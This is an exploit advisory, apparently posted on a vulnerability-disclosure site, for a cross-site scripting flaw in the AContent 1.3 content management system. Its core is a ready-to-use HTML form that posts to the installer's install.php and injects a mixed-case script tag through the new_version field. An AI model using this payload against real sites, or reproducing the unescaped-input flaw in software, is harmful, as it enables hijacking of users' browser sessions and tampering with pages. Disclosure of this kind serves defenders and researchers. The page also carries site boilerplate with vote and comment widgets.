AContent Content Management System Cross Site Scripting

2016.12.31

Ashiyane Digital Security Team (GB)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+] Version : 1.3
|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code:
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
<input type="hidden" name="action" value="process" />
<input type="hidden" name="step" value="1" />
<input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />
<input type="submit" name="submit" class="button" value="I Agree" />
<input type="submit" name="submit" class="button" value="I Disagree" /><br />
</form>
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AContent Content Management System Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.